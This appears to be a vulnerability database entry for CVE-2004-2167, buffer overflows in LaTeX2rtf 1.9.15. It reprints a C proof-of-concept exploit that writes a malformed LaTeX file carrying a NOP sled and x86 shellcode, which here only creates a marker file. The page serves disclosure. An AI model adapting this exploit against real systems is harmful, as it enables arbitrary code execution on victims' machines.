CVE-2004-2167
CVSS 7.5
Published: 2004-12-31 00:00:00
Revised: 2008-09-05 16:43:23
NMCOE    

[Original text] Multiple buffer overflows in LaTeX2rtf 1.9.15, and possibly other versions, allow remote attackers to execute arbitrary code via (1) the expandmacro function, and possibly (2) Environments and (3) TranslateCommand.


[CNNVD] LaTeX2rtf Remote Buffer Overflow Vulnerability (CNNVD-200412-923)

LaTeX2rtf 1.9.15, and possibly other versions, contains multiple buffer overflow vulnerabilities. A remote attacker can execute arbitrary code via (1) the expandmacro function, and possibly (2) Environments and (3) TranslateCommand.

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may lead to system files being modified]
Availability impact: PARTIAL [may cause performance degradation or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2167
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2167
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-923
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/17460
(UNKNOWN)  XF  latex2rtf-expandmacro-bo(17460)
http://www.securitytracker.com/alerts/2004/Sep/1011367.html
(UNKNOWN)  SECTRACK  1011367
http://www.securityfocus.com/bid/11233
(VENDOR_ADVISORY)  BID  11233
http://www.osvdb.org/displayvuln.php?osvdb_id=10216
(UNKNOWN)  OSVDB  10216
http://cvs.sourceforge.net/viewcvs.py/latex2rtf/latex2rtf/definitions.c?rev=1.22&view=log
(UNKNOWN)  CONFIRM  http://cvs.sourceforge.net/viewcvs.py/latex2rtf/latex2rtf/definitions.c?rev=1.22&view=log
http://xforce.iss.net/xforce/xfdb/17487
(UNKNOWN)  XF  latex2rtf-multiple-bo(17487)

- Vulnerability information

LaTeX2rtf Remote Buffer Overflow Vulnerability
High risk  Buffer overflow
2004-12-31 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability information (24622)

LaTeX2rtf 1.9.15 Remote Buffer Overflow Vulnerability (EDBID:24622)
linux remote
2004-09-21 Verified
0 D. J. Bernstein
N/A
source: http://www.securityfocus.com/bid/11233/info

It is reported that LaTeX2rtf is susceptible to a remote buffer overflow vulnerability when handling malformed files. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable computer to gain unauthorized access. This issue is due to a failure of the application to perform proper bounds checks before copying data into a fixed-size memory buffer.

Version 1.9.15 of LaTeX2rtf is reported vulnerable to this issue. Other versions may also be affected.

#include <stdio.h>

char center[] = {
  0x59                         /*   cx = *sp++                      */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0x40                         /*   ++ax                            */
, 0x40                         /*   ++ax                            */
, 0x40                         /*   ++ax                            */
, 0xc1, 0xe0, 0x07             /*   ax <<= 7                        */
, 0x50                         /*   *--sp = ax                 0600 */
, 0xb8, 0x12, 0x34, 0x56, 0x02 /*   ax = 0x02563412                 */
, 0xc1, 0xe8, 0x18             /*   ax >>= 24                       */
, 0xc1, 0xe0, 0x08             /*   ax <<= 8                        */
, 0x50                         /*   *--sp = ax          512:O_CREAT */
, 0x51                         /*   *--sp = cx          "EXPLOITED" */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0xb0, 0x05                   /*   ax = (ax & ~255) + 5            */
, 0x50                         /*   *--sp = ax               5:open */
, 0xcd, 0x80                   /*   syscall                         */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0x50                         /*   *--sp = ax                    0 */
, 0x40                         /*   ++ax                            */
, 0x50                         /*   *--sp = ax               1:exit */
, 0xcd, 0x80                   /*   syscall                         */
} ;

int main()
{
  int i;

  printf("\\def\\row#1{");

  for (i = 0;i < 1024;++i)
    putchar('x');
  for (i = 0;i < 6;++i) {
    /* preserve args[0] */
    putchar(0x40); putchar(0x6d); putchar(0x08); putchar(0x08);
  }
  for (i = 0;i < 5;++i) {
    /* smasher */
    putchar(0x40); putchar(0xf9); putchar(0xbf); putchar(0xbf);
  }

  for (i = 0;i < 256;++i)
    putchar(0x90);

  putchar(0xeb); putchar(sizeof(center));
  /* 0xeb 0x07   means   ip += 7 */
  /* assuming here that center has at most 255 bytes */

  for (i = 0;i < sizeof center;++i)
    putchar(center[i]);

  putchar(0xe8);
  putchar(251 - sizeof center); putchar(0xff); putchar(0xff); putchar(0xff);
  /* 0xe8 0xf4 0xff 0xff 0xff   means   *--sp = ip; ip -= 12 */ 

  printf("EXPLOITED");

  printf("}\n");
  printf("\\begin{document}\n");
  printf("\\row a\n");
  printf("\\end{document}\n");
}

- Vulnerability information

10216
LaTeX2rtf expandmacro() Function Overflow
Input Manipulation
Loss of Integrity
Vendor Verified

- Vulnerability description

Unknown or Incomplete

- Timeline

2004-09-21 Unknown
2004-09-21 Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete